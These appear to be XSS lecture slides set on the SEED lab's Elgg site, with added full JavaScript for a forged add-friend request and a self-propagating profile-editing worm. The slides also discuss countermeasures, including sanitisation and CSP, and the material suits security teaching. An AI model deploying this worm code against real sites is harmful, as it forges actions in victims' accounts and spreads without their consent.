Cross-Site Scripting Attack (XSS)

Outline

The Cross-Site Scripting attack
Reflected XSS
Persistent XSS
Damage done by XSS attacks
XSS attacks to befriend with others
XSS attacks to change other people's profiles
Self-propagation
Countermeasures

The Cross-Site Scripting Attack

Basically, injected code can do whatever the user can do inside the session.

In XSS, an attacker injects malicious code into the victim's browser via the target website. Because the code arrives from the website, the browser treats it as trusted with respect to that website: it can access and change the content of the pages, read cookies belonging to the website, and send out requests on behalf of the user.

Types of XSS Attacks

Non-persistent (Reflected) XSS attack
Persistent (Stored) XSS attack

Non-persistent (Reflected) XSS Attack

If a website with reflective behavior takes user input, attackers can put JavaScript code in the input; when the input is reflected back, the JavaScript code is injected into the web page served by the website.

Assume a vulnerable search service on the website at http://, where word is provided by the user. The attacker sends the victim a crafted URL whose word parameter carries JavaScript, and tricks the victim into clicking it. Once the victim clicks the link, an HTTP GET request is sent to the web server, which returns a page containing the search result with the original input embedded in it. Here the input is JavaScript code, which runs and shows a pop-up message in the victim's browser.

Persistent (Stored) XSS Attack

Attackers send their data directly to the target website/server, which stores it in persistent storage. If the website later sends the stored data to other users, it creates a channel between the users and the attacker. Example: a user profile in a social network is such a channel, as it is set by one user and viewed by another. These channels are supposed to be data channels.

But data provided by users can contain HTML markup and JavaScript code. If the input is not sanitized properly by the website, it is sent through the channel to other users' browsers and executed there. Browsers treat it like any other code coming from the website, so the code is given the same privileges as the website's own code.

Damage Caused by XSS

Web defacing: JavaScript code can use DOM APIs to access the DOM nodes inside the hosting page, so the injected JavaScript code can make arbitrary changes to the page. Example: changing a news article page to something fake, or replacing pictures on the page.
Spoofing requests: the injected JavaScript code can send HTTP requests to the server on behalf of the user (discussed in later slides).
Stealing information: the injected JavaScript code can also steal the victim's private data, including session cookies, personal data displayed on the web page, and data stored locally by the web application.

Environment Setup

Elgg: an open-source web application for social networking, with its countermeasures against XSS disabled for the lab.
Elgg website : hosted on localhost via Apache's virtual hosting.

Attack Surfaces for XSS Attack

To launch an attack, we need to find places where we can inject JavaScript code. Input fields are potential attack surfaces where attackers can put JavaScript code. If the web application does not remove the code, the code is triggered in the browser and causes damage. In our task, we insert our code in the Brief Description field, so that when Alice views Samy's profile, the code executes and shows a simple message.

XSS Attacks to Befriend with Others

Goal: add Samy to other people's friend lists without their consent.
Investigation by attacker Samy:

Samy clicks the add-friend button from Charlie's account (discussed in CSRF) to add himself to Charlie's friend list. Using Firefox's LiveHTTPHeader extension, he captures the add-friend request.

Line : URL of Elgg's add-friend request. The UserID of the user to be added to the friend list is a parameter; here Samy's UserID (GUID) is 47.
Line : Session cookie, unique for each user and attached automatically by the browser. If the attacker's code wants to read the cookie, it is allowed to (unless the cookie is flagged HttpOnly), because the JavaScript comes from the Elgg website itself and not from a third-party page as in CSRF. For this attack the code does not even need to read it: the browser attaches it to the forged request anyway.
Line : Elgg's countermeasure against CSRF attacks (now enabled).

The main challenge is to find the values of the CSRF-countermeasure parameters _elgg_ts and _elgg_token.
Line and : The secret values are assigned to two JavaScript variables, which makes our attack easier. Our JavaScript code is injected inside the page, so it can read the page's JavaScript variables and load the values from them.

Construct an Add-friend Request

Line and : Get the timestamp and secret token from the JavaScript variables.
Line and : Construct the URL with the data attached.
The rest of the code creates a GET request using Ajax.

Inject the Code Into a Profile

Samy puts the script in the About Me section of his profile. Then we log in as Alice and visit Samy's profile. The JavaScript code runs without being displayed to Alice, and sends an add-friend request to the server.
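The add-friend payload from the preceding slides, written out as an added example (this is not the slides' own code). It assumes the SEED-lab Elgg layout: the add-friend action is a GET to /action/friends/add with parameters friend, __elgg_ts and __elgg_token (the slides write the last two with a single leading underscore), and the page exposes the two CSRF values as elgg.security.token.__elgg_ts and elgg.security.token.__elgg_token. The request-building part is pure, so it can be exercised outside a browser; in the real attack the whole block is wrapped in a script tag and pasted into the About Me field.

```javascript
// Added example (not the slides' code): the add-friend XSS payload as
// testable functions. Assumed: /action/friends/add takes friend, __elgg_ts
// and __elgg_token as query parameters, and the page exposes the CSRF values
// under elgg.security.token.

// Samy's GUID, taken from the captured request on the slides.
const ATTACKER_GUID = 47;

// Build the forged add-friend URL. Relative URL: the code runs inside the
// Elgg page, so the request is same-origin and the session cookie rides along.
function buildAddFriendUrl(friendGuid, ts, token) {
  const params = new URLSearchParams({
    friend: String(friendGuid),
    __elgg_ts: String(ts),
    __elgg_token: token,
  });
  return '/action/friends/add?' + params.toString();
}

// Read the CSRF values from the page's own JavaScript variables. The global
// object is passed in so the lookup can be tested without a browser.
function readCsrfValues(pageGlobals) {
  const tok = pageGlobals.elgg && pageGlobals.elgg.security &&
              pageGlobals.elgg.security.token;
  if (!tok) return null;  // not an Elgg page, or the variables are not loaded yet
  return { ts: tok.__elgg_ts, token: tok.__elgg_token };
}

// Send the request the way the slides do: a same-origin Ajax GET. The browser
// attaches the victim's session cookie, and the server sees valid CSRF values,
// so the request is indistinguishable from the victim clicking "add friend".
function sendAddFriend(pageGlobals) {
  const csrf = readCsrfValues(pageGlobals);
  if (!csrf) return null;
  const url = buildAddFriendUrl(ATTACKER_GUID, csrf.ts, csrf.token);
  if (typeof pageGlobals.XMLHttpRequest === 'function') {
    const xhr = new pageGlobals.XMLHttpRequest();
    xhr.open('GET', url, true);
    xhr.send();
  }
  return url;  // returned so the forged URL can be inspected
}

// In the victim's browser the payload boils down to this one call.
if (typeof window !== 'undefined') sendAddFriend(window);
```

Nothing in the block reads the cookie: the CSRF token is the only secret the code has to obtain, and it gets it from the page because it runs as the page.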

If we check Alice's friends list, Samy is added.

XSS Attacks to Change Other People's Profiles

Goal: put the statement "SAMY is MY HERO" in other people's profiles without their consent.
Investigation by attacker Samy: Samy captured an edit-profile request using LiveHTTPHeader.

Captured HTTP Request

Line : URL of the edit-profile service.
Line : Session cookie (unique for each user), attached automatically by the browser.
Line : CSRF countermeasures, now enabled.
Line : Description field with our text "Samy is my hero".
Line : Access level of each field: 2 means the field is viewable by everyone.
Line : User ID (GUID) of the victim. In the CSRF attack this had to be obtained from the source of the victim's profile page; in XSS the value can be read from the page itself. Since we do not want to limit the attack to one victim, we take the GUID from the JavaScript variable elgg.session.user.guid, which holds the GUID of whoever is currently viewing the page.

Construct the Malicious Ajax Request

The code must check that the current viewer is not Samy himself; otherwise it would modify Samy's own profile and overwrite the malicious content stored there.

Inject the Code into the Attacker's Profile

Samy places the malicious code in his profile and waits for others to visit his profile page. Log in to Alice's account and view Samy's profile. As soon as Samy's profile loads, the malicious code executes. Checking Alice's profile, we see that "SAMY IS MY HERO" has been added to the About Me field of her profile.

Self-Propagation XSS Worm

Using Samy's worm, not only are the profiles of Samy's visitors modified, their profiles can also be made to carry a copy of Samy's JavaScript code. When an infected profile is viewed by others, the code spreads further.

Challenge: how can JavaScript code produce a copy of itself? Two typical approaches:
DOM approach: the JavaScript code gets a copy of itself directly from the DOM via DOM APIs.
Link approach: the JavaScript code is included in the web page via a link, using the src attribute of the script tag.

Document Object Model (DOM) Approach

The DOM organizes the contents of the page into a tree of objects (DOM nodes). Using DOM APIs, we can access each node on the tree. If a page contains JavaScript code, it is stored as an object in the tree, so if we know the DOM node that contains the code, we can use DOM APIs to read the code from that node. Give the script node an id and use the document.getElementById() API to find it.

Use document.getElementById("worm") to get a reference to the node; its innerHTML is the content of the node, not including the script tags. So in our attack code, we can put the message in the description field along with a copy of the entire code.

Line and : Construct a copy of the worm code, including the script tags.
Line : We split the closing-tag string into two parts and use + to concatenate them. If the entire string were written literally, Firefox's HTML parser would treat it as the closing tag of the script block and the rest of the code would be ignored.
Line : In HTTP POST requests, data is sent with Content-Type application/x-www-form-urlencoded. We use the encodeURIComponent() function to encode the string.
Line : Access level of each field: 2 means public.

After Samy places this self-propagating code in his profile, when Alice visits Samy's profile the worm executes and modifies Alice's profile, placing a copy of the worm code inside it. Any user visiting Alice's profile is then infected in the same way.

Self-Propagation XSS Worm: The Link Approach

The JavaScript code xssworm.js is fetched from the URL given in the script tag's src attribute, so we do not need to include all the worm code in the profile. Inside the code, we still need to achieve both damage and self-propagation.
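The edit-profile attack and its self-propagating version, as one added example that is not the slides' own code. It assumes the SEED-lab Elgg layout: the edit-profile action is a POST to /action/profile/edit carrying name, description, accesslevel[description], guid, __elgg_ts and __elgg_token; the page exposes elgg.session.user.guid (named on the slides), elgg.session.user.name (assumed, for the required name field) and elgg.security.token.__elgg_ts / __elgg_token; and the worm's script node has id "worm". The plain profile-defacing attack is buildWormBody with an empty code string; the DOM approach adds the innerHTML copy, and linkPayload shows the link approach with an assumed src.

```javascript
// Added example (not the slides' code): the edit-profile worm, DOM approach,
// as testable functions. Field names and action path are assumptions (see
// the lead-in); the GUID check and the split closing tag are from the slides.

const ATTACKER_GUID = 47;        // Samy, from the captured request
const WORM_ID = 'worm';          // id attribute of the worm's script node
const MESSAGE = 'SAMY is MY HERO';

// Wrap the code in script tags again. The closing tag is split so that the
// HTML parser does not take the literal "</script>" inside this string as
// the end of the script block when the worm itself is inlined in a profile.
function replicate(code) {
  const headTag = '<script id="' + WORM_ID + '" type="text/javascript">';
  const tailTag = '</' + 'script>';
  return headTag + code + tailTag;
}

// Link approach: the profile only carries a reference to the worm body,
// fetched from src (an assumed, attacker-controlled location).
function linkPayload(src) {
  return '<script id="' + WORM_ID + '" type="text/javascript" src="' + src +
         '"><' + '/script>';
}

// application/x-www-form-urlencoded body, the Content-Type of the captured
// POST. encodeURIComponent takes care of <, >, &, quotes and spaces.
function formEncode(fields) {
  return Object.entries(fields)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(String(v)))
    .join('&');
}

// Body for the victim's profile, or null when the viewer is Samy himself
// (otherwise the worm would overwrite its own host profile).
function buildWormBody(viewerGuid, csrf, wormCode, viewerName) {
  if (Number(viewerGuid) === ATTACKER_GUID) return null;
  const description = wormCode ? MESSAGE + ' ' + replicate(wormCode) : MESSAGE;
  return formEncode({
    name: viewerName,                    // assumed required by the form
    description: description,            // message plus a copy of the worm
    'accesslevel[description]': 2,       // 2 = public, so every visitor sees it
    guid: viewerGuid,                    // whoever is viewing the page
    __elgg_ts: csrf.ts,
    __elgg_token: csrf.token,
  });
}

// Run inside the victim's browser: read the page variables, copy the worm's
// own code out of the DOM, and POST the edit as same-origin Ajax.
function launch(pageGlobals) {
  const doc = pageGlobals.document;
  const elgg = pageGlobals.elgg;
  if (!doc || !elgg || !elgg.session || !elgg.security) return null;
  const node = doc.getElementById(WORM_ID);
  if (!node) return null;
  // DOM approach: innerHTML of the script node is the code without its tags.
  const body = buildWormBody(
    elgg.session.user.guid,
    { ts: elgg.security.token.__elgg_ts, token: elgg.security.token.__elgg_token },
    node.innerHTML,
    elgg.session.user.name);
  if (body === null) return null;
  const xhr = new pageGlobals.XMLHttpRequest();
  xhr.open('POST', '/action/profile/edit', true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.send(body);
  return body;  // returned so the posted body can be inspected
}

if (typeof window !== 'undefined') launch(window);
```

Because innerHTML of the script node omits the tags, replicate() has to add them back, and the split "</" + "script>" is what keeps that literal from terminating the inline block once the worm is stored inside a profile page.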

Countermeasures: the Filter Approach

Remove code from user inputs. This is difficult to implement, as there are many ways to embed code other than <script>alert("XSS")</script>; a filter that only catches the obvious forms is bypassed.

Countermeasures: Elgg's Approach

PHP module HTMLawed: a highly customizable PHP script to sanitize HTML against XSS attacks.
PHP function htmlspecialchars: encodes data provided by users so that JavaScript code in the input is interpreted by browsers only as a string, not as code.

Defeating XSS using Content Security Policy

Fundamental problem: mixing data and code (code is inlined).
Solution: force data and code to be separated: (1) do not allow the inline approach; (2) only allow the link approach.

CSP Example

Policy based on the origin of the code: code from self and the other listed origins (including google) is allowed; code from anywhere else, and inline code, is blocked.

How to Securely Allow Inlined Code

Using a nonce: the policy lists a random nonce, and an inline script is allowed only if its nonce attribute carries the same value; an inline script without it is not allowed.
Using a hash of the code: the policy lists the hash of the script's content, and an inline script is allowed only if its content hashes to that value.

Setting CSP Rules

The policy is delivered to the browser in the Content-Security-Policy HTTP response header (a meta tag also works, with some restrictions).

Discussion Questions

Question 1: What are the main differences between CSRF and XSS attacks? They both have "cross-site" in their names.
Question 2: Can the countermeasures against CSRF attacks, including the secret token and the same-site cookie approach, be used to defend against XSS attacks?

Summary

Two types of XSS attacks
How to launch XSS attacks
Create a self-propagating XSS worm
Countermeasures against XSS attacks
